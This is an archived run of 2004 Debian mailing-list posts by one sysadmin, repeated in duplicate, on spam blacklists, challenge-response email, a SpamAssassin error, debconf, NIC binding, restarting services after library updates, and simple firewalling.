> dsn.rfc-ignorant.org, reject_rhsbl_client postmaster.rfc-ignorant.org

Just to publicly eat my previous words... I submitted
the request, had a *person* respond within 5 minutes
and removal is already in the queue.

Amazing.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: rbl's status?

2004-06-14 Thread Dale Amon
On Mon, Jun 14, 2004 at 04:57:42PM +1000, Russell Coker wrote:
> a test message to [EMAIL PROTECTED] and it hasn't bounced yet...  Maybe the 
> Yahoo abuse team are being butt-head's about clicking on the removal URL.

Yeah, just I found I got listed by ignoramuses about RFC's due to a
mail helper program crashing...
 
-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: rbl's status?

2004-06-13 Thread Dale Amon
On Sun, Jun 13, 2004 at 06:33:13PM +0100, Adam D. Barratt wrote:
> I'd guess that was easier than fixing all the references to the RBL[+],
> RSS and DUL littered through the documentation.

Point taken... but then again, who on Earth actually
re-reads the whole doc a second time, rather than
just a search for a specific keyword? 

I've tried a couple times. Puts me right to sleep :-)

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: rbl's status?

2004-06-13 Thread Dale Amon
On Sun, Jun 13, 2004 at 07:46:15PM +0300, Vassilii Khachaturov wrote:
> I believe it's very old news, smth like 4-5 years or so.

I'd not thought about it because they are still used
in the examples all over specs.txt. Perhaps I should
email Philip about it.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: rbl's status?

2004-06-13 Thread Dale Amon
On Sun, Jun 13, 2004 at 12:54:11PM -0400, Noah Meyerhans wrote:
> On Sun, Jun 13, 2004 at 07:46:15PM +0300, Vassilii Khachaturov wrote:
> > > What are the recommended rbl's these days?
> > 
> > Best thing is ask on NANAE or exim-users or whatever your favourite MTA is.
> > Here's what I am using here RBL-wise:
> > 
> > rbl_domains = bl.spamcop.net/reject : 
> > relays.osirusoft.com/reject :spamhaus.relays.osirusoft.com/reject : 
> > sbl.spamhaus.org/reject
> 
> You do realize that the osirusoft blacklists are defunct and have been
> for several months, right?  Basing your decision of whether or not to
> accept mail from a given host based on an answer from a defunct
> blacklist is probably not a good idea.

At least he's more up to date than I! :-)

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



rbl's status?

2004-06-13 Thread Dale Amon
I just noticed that my exim4 config access to 
rbl.mail-abuse.org is no longer valid. I'd heard
Vixie had 'gone pro' but hadn't thought much 
about it.

What are the recommended rbl's these days? 

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: rbl's status?

2004-06-13 Thread Dale Amon
On Sun, Jun 13, 2004 at 06:33:13PM +0100, Adam D. Barratt wrote:
> I'd guess that was easier than fixing all the references to the RBL[+],
> RSS and DUL littered through the documentation.

Point taken... but then again, who on Earth actually
re-reads the whole doc a second time, rather than
just a search for a specific keyword? 

I've tried a couple times. Puts me right to sleep :-)

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: rbl's status?

2004-06-13 Thread Dale Amon
On Sun, Jun 13, 2004 at 07:46:15PM +0300, Vassilii Khachaturov wrote:
> I believe it's very old news, smth like 4-5 years or so.

I'd not thought about it because they are still used
in the examples all over specs.txt. Perhaps I should
email Philip about it.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: rbl's status?

2004-06-13 Thread Dale Amon
On Sun, Jun 13, 2004 at 12:54:11PM -0400, Noah Meyerhans wrote:
> On Sun, Jun 13, 2004 at 07:46:15PM +0300, Vassilii Khachaturov wrote:
> > > What are the recommended rbl's these days?
> > 
> > Best thing is ask on NANAE or exim-users or whatever your favourite MTA is.
> > Here's what I am using here RBL-wise:
> > 
> > rbl_domains = bl.spamcop.net/reject : 
> > relays.osirusoft.com/reject :spamhaus.relays.osirusoft.com/reject : 
> > sbl.spamhaus.org/reject
> 
> You do realize that the osirusoft blacklists are defunct and have been
> for several months, right?  Basing your decision of whether or not to
> accept mail from a given host based on an answer from a defunct
> blacklist is probably not a good idea.

At least he's more up to date than I! :-)

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]




rbl's status?

2004-06-13 Thread Dale Amon
I just noticed that my exim4 config access to 
rbl.mail-abuse.org is no longer valid. I'd heard
Vixie had 'gone pro' but hadn't thought much 
about it.

What are the recommended rbl's these days? 

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Spam fights

2004-06-11 Thread Dale Amon
On Fri, Jun 11, 2004 at 08:39:12PM +1000, Russell Coker wrote:
> It won't work because challenge-response systems are technically no good.  
> While CR systems are almost never used because the people who use them are 
> universally regarded as cretins, the spammers won't bother about trying to 
> fool them.

First of all, keep in mind that I am strictly talking about 
people for whom email is an office tool equivalent to the 
paper mail coming into their physical inbox. They don't
know how the US/B/other/PO gets it there and don't care.

That said, those who can afford it will hire human 
operators to act as email gatekeepers; those who can't
will use whatever a salesman can convince them is
affordable and works. Whether we like it or not will
not figure into the decision.

I already whitelist; unless I have manually pre-cleared
you, I won't see your mail for some time. Basically until
I have time to wade thorugh the sludge, assuming I'm not
back from a trip and just look for one or two expected mails
before deleting. I imagine I'm not alone. CR may not
be the solution, but more and more people are only
taking pre-authorized (whitelist) mail.

If your business requires recieving unsolicted email,
then your business model will include the wages of 
a presorter. They are cheaper than a knowledgeable
mail admin.

As to the "type in this random code from a jpeg",
I use that on samizdata (a major blog for which I'm
one of the editors). It stopped the problem of blog-spam
cold; the human entry is stopped cold by having 
a team of writers who delete on sight.

At the end of the day, dealing with spam is an
employment opportunity, not something that will be
solved technically. Human problems require human 
solutions.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Spam fights

2004-06-11 Thread Dale Amon
On Fri, Jun 11, 2004 at 08:39:12PM +1000, Russell Coker wrote:
> It won't work because challenge-response systems are technically no good.  
> While CR systems are almost never used because the people who use them are 
> universally regarded as cretins, the spammers won't bother about trying to 
> fool them.

First of all, keep in mind that I am strictly talking about 
people for whom email is an office tool equivalent to the 
paper mail coming into their physical inbox. They don't
know how the US/B/other/PO gets it there and don't care.

That said, those who can afford it will hire human 
operators to act as email gatekeepers; those who can't
will use whatever a salesman can convince them is
affordable and works. Whether we like it or not will
not figure into the decision.

I already whitelist; unless I have manually pre-cleared
you, I won't see your mail for some time. Basically until
I have time to wade thorugh the sludge, assuming I'm not
back from a trip and just look for one or two expected mails
before deleting. I imagine I'm not alone. CR may not
be the solution, but more and more people are only
taking pre-authorized (whitelist) mail.

If your business requires recieving unsolicted email,
then your business model will include the wages of 
a presorter. They are cheaper than a knowledgeable
mail admin.

As to the "type in this random code from a jpeg",
I use that on samizdata (a major blog for which I'm
one of the editors). It stopped the problem of blog-spam
cold; the human entry is stopped cold by having 
a team of writers who delete on sight.

At the end of the day, dealing with spam is an
employment opportunity, not something that will be
solved technically. Human problems require human 
solutions.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Spam fights

2004-06-11 Thread Dale Amon
On Fri, Jun 11, 2004 at 10:45:44AM +1000, Russell Coker wrote:
> It is anti-social for every idiot on the net to think that they are important 
> enough to require a subscription from everyone who wants to send them email.

Like it or not (and I don't) that is where we are
headed if other solutions to spam are not implimented
that cover non-NANOG type persons. I strongly suspect
we'll see a generation of mail systems which greylist 
by default at the very least. Perhaps a future 
secreterial job will be to wade through the muck and
query the boss as to whether one or two should be
allowed access.

For some people, even the volume of non-spam mail
could be rather intolerable. Imagine if you were
Tom Hanks and your private email got out and you
had to go through thousands of adoring fan mails
to find that movie contract from your agent...

Pre-authorization for email is the way things are
going to go. 

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Spam fights

2004-06-11 Thread Dale Amon
On Fri, Jun 11, 2004 at 10:45:44AM +1000, Russell Coker wrote:
> It is anti-social for every idiot on the net to think that they are important 
> enough to require a subscription from everyone who wants to send them email.

Like it or not (and I don't) that is where we are
headed if other solutions to spam are not implimented
that cover non-NANOG type persons. I strongly suspect
we'll see a generation of mail systems which greylist 
by default at the very least. Perhaps a future 
secreterial job will be to wade through the muck and
query the boss as to whether one or two should be
allowed access.

For some people, even the volume of non-spam mail
could be rather intolerable. Imagine if you were
Tom Hanks and your private email got out and you
had to go through thousands of adoring fan mails
to find that movie contract from your agent...

Pre-authorization for email is the way things are
going to go. 

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Problem with Spam Assassin

2004-06-06 Thread Dale Amon
Has anyone else been seeing this problem with spamassasin?

sa-learn --spam --mbox spambox

Argument "\008566332M-XM-yM-@@" isn't numeric in numeric lt (<) at 
/usr/share/perl5/Mail/SpamAssassin/BayesStore.pm line 1267.
  |
  |
  for pages and pages and pages

The lines in question are:

# Make sure to check for either !defined or "" ...  Apparently
# sometimes the DB module doesn't return the value correctly. :(
my $oldmagic = $self->{db_toks}->{$OLDEST_TOKEN_AGE_MAGIC_TOKEN};
--> if (!defined ($oldmagic) || $oldmagic eq "" || $atime < $oldmagic) {
  $self->{db_toks}->{$OLDEST_TOKEN_AGE_MAGIC_TOKEN} = $atime;

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Problem with Spam Assassin

2004-06-06 Thread Dale Amon
Has anyone else been seeing this problem with spamassasin?

sa-learn --spam --mbox spambox

Argument "\008566332M-XM-yM-@@" isn't numeric in numeric lt (<) at 
/usr/share/perl5/Mail/SpamAssassin/BayesStore.pm line 1267.
  |
  |
  for pages and pages and pages

The lines in question are:

# Make sure to check for either !defined or "" ...  Apparently
# sometimes the DB module doesn't return the value correctly. :(
my $oldmagic = $self->{db_toks}->{$OLDEST_TOKEN_AGE_MAGIC_TOKEN};
--> if (!defined ($oldmagic) || $oldmagic eq "" || $atime < $oldmagic) {
  $self->{db_toks}->{$OLDEST_TOKEN_AGE_MAGIC_TOKEN} = $atime;

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: how debconf manages passwds

2004-06-04 Thread Dale Amon
On Wed, Jun 02, 2004 at 12:19:35AM -0700, Matt Zimmerman wrote:
> On Wed, May 26, 2004 at 07:33:12PM +0200, jorge salamero wrote:
> 
> > yes but ...
> > 
> > /usr/sbin/dpkg-reconfigure: cacti is not fully installed
> 
> man dpkg-reconfigure

Or else just manually edit the debian registry ;-)

/var/cache/debconf/config.dat

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: how debconf manages passwds

2004-06-04 Thread Dale Amon
On Wed, Jun 02, 2004 at 12:19:35AM -0700, Matt Zimmerman wrote:
> On Wed, May 26, 2004 at 07:33:12PM +0200, jorge salamero wrote:
> 
> > yes but ...
> > 
> > /usr/sbin/dpkg-reconfigure: cacti is not fully installed
> 
> man dpkg-reconfigure

Or else just manually edit the debian registry ;-)

/var/cache/debconf/config.dat

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Server slowdown...

2004-04-14 Thread Dale Amon
On Wed, Apr 14, 2004 at 11:20:49PM +0200, Jaroslaw Tabor wrote:
> I'm almost sure that this is software problem. The machine is working
> without hardware changes for years, and it didn't happend before.
> The only changes I did, are software updates (from debian-security)
> and kernel upgrade after last holes were discovered.

It sounds like a slow memory leak to me. I had the
same problem years and years ago... it finally sorted
itself out with another upgrade a year later. They
can be the devil to find.

Are you getting any disk thrashing as it approaches
'death'?

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Server slowdown...

2004-04-14 Thread Dale Amon
On Wed, Apr 14, 2004 at 11:20:49PM +0200, Jaroslaw Tabor wrote:
> I'm almost sure that this is software problem. The machine is working
> without hardware changes for years, and it didn't happend before.
> The only changes I did, are software updates (from debian-security)
> and kernel upgrade after last holes were discovered.

It sounds like a slow memory leak to me. I had the
same problem years and years ago... it finally sorted
itself out with another upgrade a year later. They
can be the devil to find.

Are you getting any disk thrashing as it approaches
'death'?

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Slightly OT: Setting the primary NIC

2004-03-21 Thread Dale Amon
On Sun, Mar 21, 2004 at 10:20:06AM +0100, Sven Riedel wrote:
> I'm struggeling with a problem on a multi-homed host running debian, and

Well, it's not actually multi-homed. I'll bet both of your
NIC's are contained inside the same ASN and that they aren't even
running BGP ;-)

> Anyway, the Host has an internal NIC and an external NIC (acting among
> other things as a firewall). For some reason, all services think the
> external NIC is the primary, and will try to bind to that/all requests
> from samba/cups etc have a source IP from the external NIC, which
> complicates the setups of the internal hosts.

Many daemons have config statements for binding to
particular ports. You'll have to set them up on a
case by case basis. 

Most of them will bind by default to all ip's defined
for the host.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Slightly OT: Setting the primary NIC

2004-03-21 Thread Dale Amon
On Sun, Mar 21, 2004 at 10:20:06AM +0100, Sven Riedel wrote:
> I'm struggeling with a problem on a multi-homed host running debian, and

Well, it's not actually multi-homed. I'll bet both of your
NIC's are contained inside the same ASN and that they aren't even
running BGP ;-)

> Anyway, the Host has an internal NIC and an external NIC (acting among
> other things as a firewall). For some reason, all services think the
> external NIC is the primary, and will try to bind to that/all requests
> from samba/cups etc have a source IP from the external NIC, which
> complicates the setups of the internal hosts.

Many daemons have config statements for binding to
particular ports. You'll have to set them up on a
case by case basis. 

Most of them will bind by default to all ip's defined
for the host.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Checking what running program are using old libraries

2004-03-18 Thread Dale Amon
On Thu, Mar 18, 2004 at 12:03:29PM +0100, Jan Dittberner wrote:
> Such a script exists in testing
> 
> package: debian-goodies
> filename: /usr/bin/checkrestart

Of course you have to do different things for different
PID's. Most daemons you can 'restart'. Some you might
have to 'stop' and then 'start'. getty's you just kill
because init will restart them. You have to logout and
reconnect on all your remote ssh sessions.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Checking what running program are using old libraries

2004-03-18 Thread Dale Amon

While we're on the subject, what is apache doing?
apache26756 root  memDEL0,5   393216 
/SYSV
apache26757 www-data  memDEL0,5   393216 
/SYSV
apache26758 www-data  memDEL0,5   393216 
/SYSV

is it opening tmp files and immediately deleting 
them like mailers do so they vanish if the program dies?

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Checking what running program are using old libraries

2004-03-18 Thread Dale Amon
On Thu, Mar 18, 2004 at 12:03:29PM +0100, Jan Dittberner wrote:
> Such a script exists in testing
> 
> package: debian-goodies
> filename: /usr/bin/checkrestart

Of course you have to do different things for different
PID's. Most daemons you can 'restart'. Some you might
have to 'stop' and then 'start'. getty's you just kill
because init will restart them. You have to logout and
reconnect on all your remote ssh sessions.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Checking what running program are using old libraries

2004-03-18 Thread Dale Amon

While we're on the subject, what is apache doing?
apache26756 root  memDEL0,5   393216 /SYSV
apache26757 www-data  memDEL0,5   393216 /SYSV
apache26758 www-data  memDEL0,5   393216 /SYSV

is it opening tmp files and immediately deleting 
them like mailers do so they vanish if the program dies?

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: apt-get upgrade and kernel images

2004-02-27 Thread Dale Amon
On Fri, Feb 27, 2004 at 10:47:41AM +, Jeremy Sowden wrote:
> > Note that the package name is truncated with "dpkg -l"
> > (cf. dpkg-query...).
> 
> 
> The truncation can be remedied.  I tend to use:
> 
> COLUMNS=150 dpkg -l 'kernel-*' | awk '$1 ~ /ii/ { print $0 }'
> 
> to check what I've got installed.

These will give you just the name lists:

apt-cache pkgnames
dpkg --get-selections

but not the version info. Useful in some 
circumstances.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: apt-get upgrade and kernel images

2004-02-27 Thread Dale Amon
On Fri, Feb 27, 2004 at 10:47:41AM +, Jeremy Sowden wrote:
> > Note that the package name is truncated with "dpkg -l"
> > (cf. dpkg-query...).
> 
> 
> The truncation can be remedied.  I tend to use:
> 
> COLUMNS=150 dpkg -l 'kernel-*' | awk '$1 ~ /ii/ { print $0 }'
> 
> to check what I've got installed.

These will give you just the name lists:

apt-cache pkgnames
dpkg --get-selections

but not the version info. Useful in some 
circumstances.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Fwd: Re: [ox-en] Walther

2004-02-25 Thread Dale Amon
On Wed, Feb 25, 2004 at 06:02:22PM +0200, Martin Hardie wrote:
> so the use of debian products for rascist work is ok for debian
> by using debian he associates debians products with rascism
> 
> On Wednesday 25 February 2004 17:41, Dale Amon wrote:
> > On Wed, Feb 25, 2004 at 04:37:20PM +0200, Martin Hardie wrote:
> > > or is good code more important than this sort of stuff?
> >
> > Yes, as long as his personal beliefs are kept outside
> > of Debian. I think a severe warning to keep his politics
> > outside of Debian would be sufficient.

Debian is useable by anyoen. Let's not go down that
road or you'll have everyone trying to decide who is
allowed to use what software for what purpose and since
practically everyone hates *someone*, the whole endeavour
dies. 

The software is just there for all to use on an 
equal basis. Even an al Qaeda member can use debian... 
although I'd shoot them dead on sight if I met them in 
person. But that would have nothing to do with Debian or
Debian use or Debian policy or Debian anything.

That's why there are very wise rules in Debian and GPL
in general to make software freely available to *all*
persons.

Why don't we drop this thread and leave it to the 
list maintainer?

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Fwd: Re: [ox-en] Walther

2004-02-25 Thread Dale Amon
On Wed, Feb 25, 2004 at 04:37:20PM +0200, Martin Hardie wrote:
> or is good code more important than this sort of stuff?

Yes, as long as his personal beliefs are kept outside
of Debian. I think a severe warning to keep his politics
outside of Debian would be sufficient.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Fwd: Re: [ox-en] Walther

2004-02-25 Thread Dale Amon
On Wed, Feb 25, 2004 at 06:02:22PM +0200, Martin Hardie wrote:
> so the use of debian products for rascist work is ok for debian
> by using debian he associates debians products with rascism
> 
> On Wednesday 25 February 2004 17:41, Dale Amon wrote:
> > On Wed, Feb 25, 2004 at 04:37:20PM +0200, Martin Hardie wrote:
> > > or is good code more important than this sort of stuff?
> >
> > Yes, as long as his personal beliefs are kept outside
> > of Debian. I think a severe warning to keep his politics
> > outside of Debian would be sufficient.

Debian is useable by anyoen. Let's not go down that
road or you'll have everyone trying to decide who is
allowed to use what software for what purpose and since
practically everyone hates *someone*, the whole endeavour
dies. 

The software is just there for all to use on an 
equal basis. Even an al Qaeda member can use debian... 
although I'd shoot them dead on sight if I met them in 
person. But that would have nothing to do with Debian or
Debian use or Debian policy or Debian anything.

That's why there are very wise rules in Debian and GPL
in general to make software freely available to *all*
persons.

Why don't we drop this thread and leave it to the 
list maintainer?

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Fwd: Re: [ox-en] Walther

2004-02-25 Thread Dale Amon
On Wed, Feb 25, 2004 at 04:37:20PM +0200, Martin Hardie wrote:
> or is good code more important than this sort of stuff?

Yes, as long as his personal beliefs are kept outside
of Debian. I think a severe warning to keep his politics
outside of Debian would be sufficient.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: How To Set Up Mail-out-only System ?

2004-02-10 Thread Dale Amon
On Wed, Feb 11, 2004 at 01:41:13AM +, Nick Boyce wrote:
> I've just set up a "secure" (you know .. more than usual) Debian system, 
> and want to arrange things so that it can send mail out when necessary 
> (in case anything happens that it thinks I should know about) but is 
> *not* constantly listening for incoming mail.

You could firewall incoming port 25 connections...

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: How To Set Up Mail-out-only System ?

2004-02-10 Thread Dale Amon
On Wed, Feb 11, 2004 at 01:41:13AM +, Nick Boyce wrote:
> I've just set up a "secure" (you know .. more than usual) Debian system, 
> and want to arrange things so that it can send mail out when necessary 
> (in case anything happens that it thinks I should know about) but is 
> *not* constantly listening for incoming mail.

You could firewall incoming port 25 connections...

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



cflows and debian

2004-02-08 Thread Dale Amon
Does anyone know where I can find a cflowd package?

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



cflows and debian

2004-02-08 Thread Dale Amon
Does anyone know where I can find a cflowd package?

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Firewall: Need Advice

2004-02-07 Thread Dale Amon
On Sat, Feb 07, 2004 at 10:38:51AM +0200, E&Erdem wrote:
> I've been using iptables (or i assuming that). But at boot time it gives
> an error: "Aborting iptables load: unknown rulesets "active" ". I
> couldn't find the problem. I searched via google, and found
> dpkg-reconfigure iptables. But it didn't help. I read a lot of iptables
> documents. But i think i lost some points, because i don't understand
> something. 

Since I do my own firewall from scratch and don't
touch the auto-installed stuff, I can only surmise.

There may be a script in /etc/init.d/ that is loading
a debian default firewall if you selected a package
with a default firewall.

I seem to remember running across a script that reads
on startup and write on stop to a directory in /etc/defaults
or something like that.

I will also add that if you are going down the route
of creating your own frow scratch, make sure you read
and re-read the HOWTO's on iptables and firewalling
and that you have a good knowledge of routing.

However if your requirements are very simple, it is 
not hard to do a Masquerade firewall. And if you wish
to go one step past that and close all outgoing ports
and then allow a few specific ones, that also is not
very complex.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Firewall: Need Advice

2004-02-07 Thread Dale Amon
On Sat, Feb 07, 2004 at 10:38:51AM +0200, E&Erdem wrote:
> I've been using iptables (or i assuming that). But at boot time it gives
> an error: "Aborting iptables load: unknown rulesets "active" ". I
> couldn't find the problem. I searched via google, and found
> dpkg-reconfigure iptables. But it didn't help. I read a lot of iptables
> documents. But i think i lost some points, because i don't understand
> something. 

Since I do my own firewall from scratch and don't
touch the auto-installed stuff, I can only surmise.

There may be a script in /etc/init.d/ that is loading
a debian default firewall if you selected a package
with a default firewall.

I seem to remember running across a script that reads
on startup and write on stop to a directory in /etc/defaults
or something like that.

I will also add that if you are going down the route
of creating your own frow scratch, make sure you read
and re-read the HOWTO's on iptables and firewalling
and that you have a good knowledge of routing.

However if your requirements are very simple, it is 
not hard to do a Masquerade firewall. And if you wish
to go one step past that and close all outgoing ports
and then allow a few specific ones, that also is not
very complex.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Question on security.debian.org

2004-02-01 Thread Dale Amon
Any more news on what is wrong with security.debian.org?

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Question on security.debian.org

2004-02-01 Thread Dale Amon
Any more news on what is wrong with security.debian.org?

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Query NS

2004-02-01 Thread Dale Amon
On Sun, Feb 01, 2004 at 03:46:07PM +0100, Hans Spaans wrote:
> You added it globally and to every zone? Also allow-transfer is a nice 
